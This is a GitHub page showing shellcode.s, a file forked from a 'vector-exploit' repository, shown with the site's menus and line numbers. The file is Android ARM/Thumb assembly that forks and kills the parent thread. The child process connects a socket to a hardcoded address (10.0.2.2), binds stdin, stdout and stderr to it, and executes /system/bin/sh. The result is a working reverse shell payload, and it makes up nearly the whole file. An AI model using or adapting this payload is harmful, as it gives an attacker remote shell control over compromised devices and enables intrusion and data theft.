forked from hackedteam/vector-exploit
-
Notifications
You must be signed in to change notification settings - Fork 0
Expand file tree
/
Copy pathshellcode.s
More file actions
76 lines (55 loc) · 1.23 KB
/
shellcode.s
File metadata and controls
76 lines (55 loc) · 1.23 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
.globl _start
_start:
.code 32
add r1, pc, #1
bx r1
.code 16
/* fork */
nop
mov r3, #0
mov r2, #0
mov r1, #0
mov r0, #0
mov r7, #2
svc 1
cmp r0, #0 /* child is 0 */
beq child
/* odd */
/* parent only coe */
mov r7, #224 /* gettid */
svc 1
mov r1, #15 /* send sigterm */
mov r7, #238
svc 1
/* child only */
child:
mov r0, #2
mov r1, #1
sub r2, r2, r2
lsl r7, r1, #8
add r7, r7, #25 /* socket(2, 1, 0) */
svc 1
mov r6, r0
add r1, pc, #32
mov r2, #16
add r7, #2
svc 1 /* connect(r0, &addr, 16) */
mov r7, #63
mov r1, #2
Lb:
mov r0, r6
svc 1
sub r1, #1
bpl Lb /* dup2(r0, 0/1/2) */
add r0, pc, #20
sub r2, r2, r2
push {r0, r2}
mov r1, sp
mov r7, #11
svc 1 /* execve("/system/bin/sh", ["/system/bin/sh", 0], 0) */
.align 2 /* struct sockaddr */
.short 0x2
.short 0x3412
.byte 10,0,2,2
.ascii "/system/bin/sh\0\0"
parent_jump: .word 0xa84e5147